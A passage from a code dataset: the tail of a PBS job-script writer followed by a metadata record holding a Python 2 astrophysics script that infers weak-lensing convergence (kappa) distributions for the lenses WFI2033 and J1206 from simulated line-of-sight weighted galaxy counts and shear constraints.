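    # commands: list of shell command strings, written one per line in the job body
    body = PBS_TEMPLATE.format(tag=tag, workdir=workdir, commands='\n'.join(commands))
    path = os.path.join(outdir, 'batch_infersim%s.sh' % tag)
    with open(path, 'w') as f:
        f.write(body)
    return path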
{ "alpha_fraction": 0.595751941204071, "alphanum_fraction": 0.6414938569068909, "avg_line_length": 69.7549819946289, "blob_id": "2532dad5e920df37da1387d4973ed78587e1d542", "content_id": "489ff07a8797420ca59cbd00ad571f381d58b942", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 49670, "license_type": "no_license", "max_line_length": 761, "num_lines": 702, "path": "/python/catalogue_utilities/obsolete/inferkappa_unbiasedwithshear.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# CE Rusu Feb 14 2018\n# Run as: python /lfs08/rusucs/code/inferkappa_unbiasedwithshear.py WFI2033 -1.0 -1.0 nohandpicked fiducial 5 45 23 meds gal gamma oneoverr mass\n# when a single radius is used (not mixing different radii constraints) this code is faster than inferkappa_unbiasedwithshear45and120.py because it doesn't read the id column\n# the code currently works for maglim 23 (WFI2033)\n# Description of arguments: inferkappa_unbiasedwithshear.py lens zinf zsup handpicked other innermask radius maglim sum/meds list_of_weight_constraints\n# weight1 should always be \"gal\", in order to use the galaxy counts when correcting the bias due to different LOS\n# the code is written such that, if shear is used as overdensity, it should be the second weight used (unless only one weight is used);\n\nimport sys\nimport os\nfrom os import system\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport time\n\nstart_time=time.time()\n\nlens = str(sys.argv[1])\nzinf = str(sys.argv[2])\nzsup = str(sys.argv[3])\nhandpicked = str(sys.argv[4])\nother = str(sys.argv[5]) # refers to an optional suffix for the shear constraint\ninnermask = str(sys.argv[6])\nradius = str(sys.argv[7])\nmag = str(sys.argv[8])\nmode = str(sys.argv[9])\nconjoined = len(sys.argv) - 10 # number of weight constraints: the total argument count minus the code name and the nine non-weight arguments\n\nif handpicked == 'nohandpicked': handpickedstr = ''\nelse: handpickedstr = '_'+str(sys.argv[4])\n\nif conjoined == 1:\n    weightin1 = str(sys.argv[10])\nif conjoined == 2:\n    weightin1 = str(sys.argv[10])\n    weightin2 = str(sys.argv[11])\nif conjoined == 3:\n    weightin1 = str(sys.argv[10])\n    weightin2 = str(sys.argv[11])\n    weightin3 = str(sys.argv[12])\nif conjoined == 4:\n    weightin1 = str(sys.argv[10])\n    weightin2 = str(sys.argv[11])\n    weightin3 = str(sys.argv[12])\n    weightin4 = str(sys.argv[13])\n\nprint \"conjoined:\", conjoined\n#root = \"/lfs08/rusucs/%s/MSwghtratios/\" % lens\n#root = \"/mnt/scratch/rusucs/%s/MSwghtratios/\" % lens\nroot = \"/Volumes/LaCieSubaru/MSweights/\"\n#rootcode = \"/mnt/scratch/rusucs/code/\"\nrootcode = \"/Users/cerusu/GITHUB/zMstarPDF/python/catalogue_utilities/\"\n#rootout = \"/lfs08/rusucs/%s/MSkapparesults/\" % lens\nrootout = \"/Volumes/LaCieSubaru/kapparesults/\"\n#rootout = \"/mnt/scratch/rusucs/%s/kapparesults/\" % lens\n#weightsfile = np.loadtxt(root+'weightedcounts_%s_%s_%sinner%s_zgap%s_%s.cat' %(lens,mode,innermask,handpickedstr,zinf,zsup),usecols=[1,2,3,4,5,6],unpack=True) # the file where I recorded the overdensities which I measured for the real lens\n#weightsfile = np.loadtxt(rootcode+'weightedcounts_%s_%s_%sinner%s_zgap%s_%s.cat' %(lens,mode,innermask,handpickedstr,zinf,zsup),usecols=[1,2,3,4,5,6],unpack=True) # the file where I recorded the overdensities which I measured for the real lens\nweightsfile = np.loadtxt('/Users/cerusu/Dropbox/Davis_work/code/%s/weightedcounts_%s_%s_%s_%sinner%s_zgap%s_%s.cat' %(lens,lens,mode,mag,innermask,handpickedstr,zinf,zsup),usecols=[1,2,3,4,5,6],unpack=True) # the file where I recorded the overdensities which I measured for the real lens\nlimsigma = 2 # sigma limits on either side of the assumed gaussians\nbin_stat = 2000\nmin_kappa = -0.10\nmax_kappa = 1\n\nincrement1 = 4 # refers to the E interval from Greene et al. 
2014\nincrement2 = 10\nincrement3 = 4\nincrement4 = 2\n\n# define the shear constraints\nif lens == \"WFI2033\":\n    if other == 'fiducial' and handpicked == 'nohandpicked' and float(zsup) < 0 and innermask == '5':\n        constr_gamma = 0.154\n        constrwidth_gamma_inf = 0.139\n        constrwidth_gamma_sup = 0.169\n    if other == 'chameleon' and handpicked == 'nohandpicked' and float(zsup) < 0 and innermask == '5':\n        constr_gamma = 0.193\n        constrwidth_gamma_inf = 0.178\n        constrwidth_gamma_sup = 0.208\n    if other == 'fiducial' and (handpicked == 'handpicked' or handpicked == 'removegrouphandpicked' or innermask == '15' or float(zsup) > 0):\n        constr_gamma = 0.09\n        constrwidth_gamma_inf = 0.075\n        constrwidth_gamma_sup = 0.105\n    filters = \"ugrizJHK\"\n    print 'shear: ',constr_gamma\nif lens == \"J1206\":\n    constr_gamma = 0.04\n    constrwidth_gamma_inf = 0.03\n    constrwidth_gamma_sup = 0.05\n\n# declare which weights to read\nif mag == \"23\" and radius == \"45\":\n    measured_index = 0 # specifies the column index in weightsfile\n    measured_index_inf = 1\n    measured_index_sup = 2\nif mag == \"23\" and radius == \"120\":\n    measured_index = 3\n    measured_index_inf = 4\n    measured_index_sup = 5\n\ndef declareweight(weightin):\n    if weightin == \"gal\": weight_index = 4\n    if weightin == \"z\": weight_index = 5\n    if weightin == \"mass\": weight_index = 6\n    if weightin == \"mass2\": weight_index = 7\n    if weightin == \"mass3\": weight_index = 8\n    if weightin == \"oneoverr\": weight_index = 9\n    if weightin == \"zoverr\": weight_index = 10\n    if weightin == \"massoverr\": weight_index = 11\n    if weightin == \"mass2overr\": weight_index = 12\n    if weightin == \"mass3overr\": weight_index = 13\n    if weightin == \"mass2rms\": weight_index = 14\n    if weightin == \"mass3rms\": weight_index = 15\n    if weightin == \"mass2overrrms\": weight_index = 16\n    if weightin == \"mass3overrrms\": weight_index = 17\n    if weightin == \"flexion\": weight_index = 18\n    if weightin == \"tidal\": weight_index = 19\n    if weightin == \"SIS\": weight_index = 20\n    if weightin == \"SIShalo\": weight_index = 21\n    if weightin == \"gamma\": weight_index = None\n    return weight_index\n\nif mag == \"23\":\n    weight1_index = declareweight(weightin1)\nif conjoined >= 2:\n    if mag == \"23\":\n        weight2_index = declareweight(weightin2)\n    if conjoined >= 3:\n        if mag == \"23\":\n            weight3_index = declareweight(weightin3)\n        if conjoined == 4:\n            if mag == \"23\":\n                weight4_index = declareweight(weightin4)\n\n# read weight constraints\nconstr_gal_meds = weightsfile[measured_index][0]\nconstrwidth_gal_meds_inf = weightsfile[measured_index_inf][0]\nconstrwidth_gal_meds_sup = weightsfile[measured_index_sup][0]\n\nconstr_z_meds = weightsfile[measured_index][1]\nconstrwidth_z_meds_inf = weightsfile[measured_index_inf][1]\nconstrwidth_z_meds_sup = weightsfile[measured_index_sup][1]\n\nconstr_mass_meds = weightsfile[measured_index][2]\nconstrwidth_mass_meds_inf = weightsfile[measured_index_inf][2]\nconstrwidth_mass_meds_sup = weightsfile[measured_index_sup][2]\n\nconstr_mass2_meds = weightsfile[measured_index][3]\nconstrwidth_mass2_meds_inf = weightsfile[measured_index_inf][3]\nconstrwidth_mass2_meds_sup = weightsfile[measured_index_sup][3]\n\nconstr_mass3_meds = weightsfile[measured_index][4]\nconstrwidth_mass3_meds_inf = 
weightsfile[measured_index_inf][4]\nconstrwidth_mass3_meds_sup = weightsfile[measured_index_sup][4]\n\nconstr_oneoverr_meds = weightsfile[measured_index][5]\nconstrwidth_oneoverr_meds_inf = weightsfile[measured_index_inf][5]\nconstrwidth_oneoverr_meds_sup = weightsfile[measured_index_sup][5]\n\nconstr_zoverr_meds = weightsfile[measured_index][6]\nconstrwidth_zoverr_meds_inf = weightsfile[measured_index_inf][6]\nconstrwidth_zoverr_meds_sup = weightsfile[measured_index_sup][6]\n\nconstr_massoverr_meds = weightsfile[measured_index][7]\nconstrwidth_massoverr_meds_inf = weightsfile[measured_index_inf][7]\nconstrwidth_massoverr_meds_sup = weightsfile[measured_index_sup][7]\n\nconstr_mass2overr_meds = weightsfile[measured_index][8]\nconstrwidth_mass2overr_meds_inf = weightsfile[measured_index_inf][8]\nconstrwidth_mass2overr_meds_sup = weightsfile[measured_index_sup][8]\n\nconstr_mass3overr_meds = weightsfile[measured_index][9]\nconstrwidth_mass3overr_meds_inf = weightsfile[measured_index_inf][9]\nconstrwidth_mass3overr_meds_sup = weightsfile[measured_index_sup][9]\n\nconstr_mass2rms_meds = weightsfile[measured_index][10]\nconstrwidth_mass2rms_meds_inf = weightsfile[measured_index_inf][10]\nconstrwidth_mass2rms_meds_sup = weightsfile[measured_index_sup][10]\n\nconstr_mass3rms_meds = weightsfile[measured_index][11]\nconstrwidth_mass3rms_meds_inf = weightsfile[measured_index_inf][11]\nconstrwidth_mass3rms_meds_sup = weightsfile[measured_index_sup][11]\n\nconstr_mass2overrrms_meds = weightsfile[measured_index][12]\nconstrwidth_mass2overrrms_meds_inf = weightsfile[measured_index_inf][12]\nconstrwidth_mass2overrrms_meds_sup = weightsfile[measured_index_sup][12]\n\nconstr_mass3overrrms_meds = weightsfile[measured_index][13]\nconstrwidth_mass3overrrms_meds_inf = weightsfile[measured_index_inf][13]\nconstrwidth_mass3overrrms_meds_sup = weightsfile[measured_index_sup][13]\n\nconstr_flexion_meds = weightsfile[measured_index][14]\nconstrwidth_flexion_meds_inf = weightsfile[measured_index_inf][14]\nconstrwidth_flexion_meds_sup = weightsfile[measured_index_sup][14]\n\nconstr_tidal_meds = weightsfile[measured_index][15]\nconstrwidth_tidal_meds_inf = weightsfile[measured_index_inf][15]\nconstrwidth_tidal_meds_sup = weightsfile[measured_index_sup][15]\n\nconstr_SIS_meds = weightsfile[measured_index][16]\nconstrwidth_SIS_meds_inf = weightsfile[measured_index_inf][16]\nconstrwidth_SIS_meds_sup = weightsfile[measured_index_sup][16]\n\nconstr_SIShalo_meds = weightsfile[measured_index][17]\nconstrwidth_SIShalo_meds_inf = weightsfile[measured_index_inf][17]\nconstrwidth_SIShalo_meds_sup = weightsfile[measured_index_sup][17]\n\ndef declareweight(weightin):\n if weightin == \"gal\": constr_weight = constr_gal_meds; constrwidth_weight_inf = constrwidth_gal_meds_inf; constrwidth_weight_sup = constrwidth_gal_meds_sup\n if weightin == \"z\": constr_weight = constr_z_meds; constrwidth_weight_inf = constrwidth_z_meds_inf; constrwidth_weight_sup = constrwidth_z_meds_sup\n if weightin == \"mass\": constr_weight = constr_mass_meds; constrwidth_weight_inf = constrwidth_mass_meds_inf; constrwidth_weight_sup = constrwidth_mass_meds_sup\n if weightin == \"mass2\": constr_weight = constr_mass2_meds; constrwidth_weight_inf = constrwidth_mass2_meds_inf; constrwidth_weight_sup = constrwidth_mass2_meds_sup\n if weightin == \"mass3\": constr_weight = constr_mass3_meds; constrwidth_weight_inf = constrwidth_mass3_meds_inf; constrwidth_weight_sup = constrwidth_mass3_meds_sup\n if weightin == \"oneoverr\": constr_weight = constr_oneoverr_meds; 
constrwidth_weight_inf = constrwidth_oneoverr_meds_inf; constrwidth_weight_sup = constrwidth_oneoverr_meds_sup\n if weightin == \"zoverr\": constr_weight = constr_zoverr_meds; constrwidth_weight_inf = constrwidth_zoverr_meds_inf; constrwidth_weight_sup = constrwidth_zoverr_meds_sup\n if weightin == \"massoverr\": constr_weight = constr_massoverr_meds; constrwidth_weight_inf = constrwidth_massoverr_meds_inf; constrwidth_weight_sup = constrwidth_massoverr_meds_sup\n if weightin == \"mass2overr\": constr_weight = constr_mass2overr_meds; constrwidth_weight_inf = constrwidth_mass2overr_meds_inf; constrwidth_weight_sup = constrwidth_mass2overr_meds_sup\n if weightin == \"mass3overr\": constr_weight = constr_mass3overr_meds; constrwidth_weight_inf = constrwidth_mass3overr_meds_inf; constrwidth_weight_sup = constrwidth_mass3overr_meds_sup\n if weightin == \"mass2rms\": constr_weight = constr_mass2rms_meds; constrwidth_weight_inf = constrwidth_mass2rms_meds_inf; constrwidth_weight_sup = constrwidth_mass2rms_meds_sup\n if weightin == \"mass3rms\": constr_weight = constr_mass3rms_meds; constrwidth_weight_inf = constrwidth_mass3rms_meds_inf; constrwidth_weight_sup = constrwidth_mass3rms_meds_sup\n if weightin == \"mass2overrrms\": constr_weight = constr_mass2overrrms_meds; constrwidth_weight_inf = constrwidth_mass2overrrms_meds_inf; constrwidth_weight_sup = constrwidth_mass2overrrms_meds_sup\n if weightin == \"mass3overrrms\": constr_weight = constr_mass3overrrms_meds; constrwidth_weight_inf = constrwidth_mass3overrrms_meds_inf; constrwidth_weight_sup = constrwidth_mass3overrrms_meds_sup\n if weightin == \"flexion\": constr_weight = constr_flexion_meds; constrwidth_weight_inf = constrwidth_flexion_meds_inf; constrwidth_weight_sup = constrwidth_flexion_meds_sup\n if weightin == \"tidal\": constr_weight = constr_tidal_meds; constrwidth_weight_inf = constrwidth_tidal_meds_inf; constrwidth_weight_sup = constrwidth_tidal_meds_sup\n if weightin == \"SIS\": constr_weight = constr_SIS_meds; constrwidth_weight_inf = constrwidth_SIS_meds_inf; constrwidth_weight_sup = constrwidth_SIS_meds_sup\n if weightin == \"SIShalo\": constr_weight = constr_SIShalo_meds; constrwidth_weight_inf = constrwidth_SIShalo_meds_inf; constrwidth_weight_sup = constrwidth_SIShalo_meds_sup\n if weightin == \"gamma\": constr_weight = constr_gamma; constrwidth_weight_inf = constrwidth_gamma_inf; constrwidth_weight_sup = constrwidth_gamma_sup\n return constr_weight, constrwidth_weight_inf, constrwidth_weight_sup\n\nif conjoined == 4: constr_weight4, constrwidth_weight4_inf, constrwidth_weight4_sup = declareweight(weightin4)\nif (conjoined == 3) | (conjoined == 4): constr_weight3, constrwidth_weight3_inf, constrwidth_weight3_sup = declareweight(weightin3)\nif (conjoined == 2) | (conjoined == 3) | (conjoined == 4): constr_weight2, constrwidth_weight2_inf, constrwidth_weight2_sup = declareweight(weightin2)\nif (conjoined == 1) | (conjoined == 2) | (conjoined == 3) | (conjoined == 4): constr_weight1, constrwidth_weight1_inf, constrwidth_weight1_sup = declareweight(weightin1)\n\nprint \"Reading...\"\n\nif mode == \"sum\": str1 = \"sum\"\nif mode == \"meds\": str1 = \"med\"\n\nif conjoined == 4:\n output = '%skappahist_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_%s_%s_%s_increments%s_%s_%s_%s.cat' % (rootout,lens,innermask,handpickedstr,zinf,zsup,other,weightin1,weightin2,weightin3,weightin4,mag,radius,mode,increment1,increment2,increment3,increment4)\n outputLOS = 
'%skappahist_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_%s_%s_%s_LOS_increments%s_%s_%s_%s.cat' % (rootout,lens,innermask,handpickedstr,zinf,zsup,other,weightin1,weightin2,weightin3,weightin4,mag,radius,mode,increment1,increment2,increment3,increment4)\nif conjoined == 3:\n output = '%skappahist_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_%s_%s_increments%s_%s_%s.cat' % (rootout,lens,innermask,handpickedstr,zinf,zsup,other,weightin1,weightin2,weightin3,mag,radius,mode,increment1,increment2,increment3)\n outputLOS = '%skappahist_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_%s_%s_LOS_increments%s_%s_%s.cat' % (rootout,lens,innermask,handpickedstr,zinf,zsup,other,weightin1,weightin2,weightin3,mag,radius,mode,increment1,increment2,increment3)\nif conjoined == 2:\n output = '%skappahist_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_%s_increments%s_%s.cat' % (rootout,lens,innermask,handpickedstr,zinf,zsup,other,weightin1,weightin2,mag,radius,mode,increment1,increment2)\n outputLOS = '%skappahist_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_%s_LOS_increments%s_%s.cat' % (rootout,lens,innermask,handpickedstr,zinf,zsup,other,weightin1,weightin2,mag,radius,mode,increment1,increment2)\nif conjoined == 1:\n output = '%skappahist_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_increments%s.cat' % (rootout,lens,innermask,handpickedstr,zinf,zsup,other,weightin1,mag,radius,mode,increment1)\n outputLOS = '%skappahist_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_LOS_increments%s.cat' % (rootout,lens,innermask,handpickedstr,zinf,zsup,other,weightin1,mag,radius,mode,increment1)\n\nif conjoined == 1:\n ''' Here I only read the columns of interest, without kappa, for ugriz, in order to find the medians of their values over the whole MS.'''\n med1 = np.zeros(8)\n for j in range(8):\n for i in range(8):\n if weightin1 != \"gamma\":\n weight1_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=[weight1_index], unpack=True)\n if i == 0:\n weight1 = weight1_\n else:\n weight1 = np.append(weight1,weight1_)\n else:\n weight1_1_,weight1_2_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=[2,3], unpack=True)\n if i == 0:\n weight1_1 = weight1_1_\n weight1_2 = weight1_2_\n else:\n weight1_1 = np.append(weight1_1,weight1_1_)\n weight1_2 = np.append(weight1_2,weight1_2_)\n print j,i\n if weightin1 != \"gamma\":\n med1[j] = np.median(weight1)\n else:\n med1[j] = np.median(np.sqrt(weight1_1**2 + weight1_2**2))\n med_weight1 = np.mean(med1) # throughout the code I use med_weight1 when computing intervals, following Green et al. For this, weight1 should always refer to simple galaxy number counts\n if weightin1 == \"gamma\":\n constr_weight1 = constr_weight1 / med_weight1 # for gamma, measured shear divided by the median value of shear in MS; this turns it into an overdensity, like the other weights, so that it is meaningful to multiply by med_weight1\n constrwidth_weight1_inf = constrwidth_weight1_inf / med_weight1\n constrwidth_weight1_sup = constrwidth_weight1_sup / med_weight1\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))]) # absolute number, e.g. 
of galaxies within the lower width\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n \n ''' Here I read ugrizJHK, converting weighted counts into overdensities, and recording the kappa values only for overdensities satisfying the constraint. I consider the full range of the constraint.'''\n for j in range(8):\n for i in range(8):\n if weightin1 != \"gamma\":\n kappa_, weight1_ = np.loadtxt(\"%snobeta35measured%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,filters,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index), unpack=True)\n weight1_ = weight1_ / med_weight1\n else:\n kappa_, gamma1_,gamma2_ = np.loadtxt(\"%snobeta35measured%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,filters,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,2,3), unpack=True)\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = gamma / med_weight1\n weight = np.copy(weight1_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ] # convert overdensities into absolute counts\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n del weight\n if (i == 0) and (j == 0):\n kappa = kappa_\n weight1 = weight1_\n else:\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n print j,i\n\nif conjoined == 2:\n med1 = np.zeros(8)\n med2 = np.zeros(8)\n for j in range(8):\n for i in range(8):\n if weightin2 != \"gamma\":\n weight1_,weight2_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(weight1_index,weight2_index), unpack=True)\n if i == 0:\n weight1 = weight1_\n weight2 = weight2_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n else:\n weight1_,weight2_1_,weight2_2_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=[weight1_index,1,2], unpack=True)\n if i == 0:\n weight1 = weight1_\n weight2_1 = weight2_1_\n weight2_2 = weight2_2_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2_1 = np.append(weight2_1,weight2_1_)\n weight2_2 = np.append(weight2_2,weight2_2_)\n print j,i\n if weightin2 != \"gamma\":\n med1[j] = np.median(weight1)\n med2[j] = np.median(weight2)\n else:\n med1[j] = np.median(weight1)\n med2[j] = np.median(np.sqrt(weight2_1**2 + weight2_2**2))\n med_weight1 = np.mean(med1)\n med_weight2 = np.mean(med2)\n if weightin2 == \"gamma\":\n constr_weight2 = constr_weight2 / med_weight2\n constrwidth_weight2_inf = constrwidth_weight2_inf / med_weight2\n constrwidth_weight2_sup = constrwidth_weight2_sup / med_weight2\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))])\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n E_w2_inf = np.max([1, round(med_weight1 * (constr_weight2 - constrwidth_weight2_inf))])\n E_w2_sup = np.max([1, 
round(med_weight1 * (-constr_weight2 + constrwidth_weight2_sup))])\n\n for j in range(8):\n for i in range(8):\n if weightin2 != \"gamma\":\n kappa_, weight1_,weight2_ = np.loadtxt(\"%snobeta35measured%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,filters,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,weight2_index), unpack=True)\n weight1_ = weight1_ / med_weight1\n weight2_ = weight2_ / med_weight2\n else:\n kappa_, weight1_,gamma1_,gamma2_ = np.loadtxt(\"%snobeta35measured%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,filters,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,2,3), unpack=True)\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = weight1_ / med_weight1\n weight2_ = gamma / med_weight2\n weight = np.copy(weight1_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n del weight\n weight = np.copy(weight2_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n del weight\n if (i == 0) and (j == 0):\n kappa = kappa_\n weight1 = weight1_\n weight2 = weight2_\n else:\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n print j,i\n\nif conjoined == 3:\n med1 = np.zeros(8)\n med2 = np.zeros(8)\n med3 = np.zeros(8)\n for j in range(8):\n for i in range(8):\n if weightin2 != \"gamma\":\n weight1_,weight2_,weight3_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(weight1_index,weight2_index,weight3_index), unpack=True)\n if i == 0:\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n else:\n weight1_,weight2_1_,weight2_2_,weight3_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(weight1_index,1,2,weight3_index), unpack=True)\n if i == 0:\n weight1 = weight1_\n weight2_1 = 
weight2_1_\n weight2_2 = weight2_2_\n weight3 = weight3_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2_1 = np.append(weight2_1,weight2_1_)\n weight2_2 = np.append(weight2_2,weight2_2_)\n weight3 = np.append(weight3,weight3_)\n print j,i\n if weightin2 != \"gamma\":\n med1[j] = np.median(weight1)\n med2[j] = np.median(weight2)\n med3[j] = np.median(weight3)\n else:\n med1[j] = np.median(weight1)\n med2[j] = np.median(np.sqrt(weight2_1**2 + weight2_2**2))\n med3[j] = np.median(weight3)\n med_weight1 = np.mean(med1)\n med_weight2 = np.mean(med2)\n med_weight3 = np.mean(med3)\n if weightin2 == \"gamma\":\n constr_weight2 = constr_weight2 / med_weight2\n constrwidth_weight2_inf = constrwidth_weight2_inf / med_weight2\n constrwidth_weight2_sup = constrwidth_weight2_sup / med_weight2\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))])\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n E_w2_inf = np.max([1, round(med_weight1 * (constr_weight2 - constrwidth_weight2_inf))])\n E_w2_sup = np.max([1, round(med_weight1 * (-constr_weight2 + constrwidth_weight2_sup))])\n E_w3_inf = np.max([1, round(med_weight1 * (constr_weight3 - constrwidth_weight3_inf))])\n E_w3_sup = np.max([1, round(med_weight1 * (-constr_weight3 + constrwidth_weight3_sup))])\n\n for j in range(8):\n for i in range(8):\n if weightin2 != \"gamma\":\n kappa_, weight1_,weight2_,weight3_ = np.loadtxt(\"%snobeta35measured%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,filters,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,weight2_index,weight3_index), unpack=True)\n weight1_ = weight1_ / med_weight1\n weight2_ = weight2_ / med_weight2\n weight3_ = weight3_ / med_weight3\n else:\n kappa_, weight1_,weight3_,gamma1_,gamma2_ = np.loadtxt(\"%snobeta35measured%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,filters,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,weight3_index,2,3), unpack=True)\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = weight1_ / med_weight1\n weight2_ = gamma / med_weight2\n weight3_ = weight3_ / med_weight3\n weight = np.copy(weight1_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n del weight\n weight = np.copy(weight2_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight1_ = 
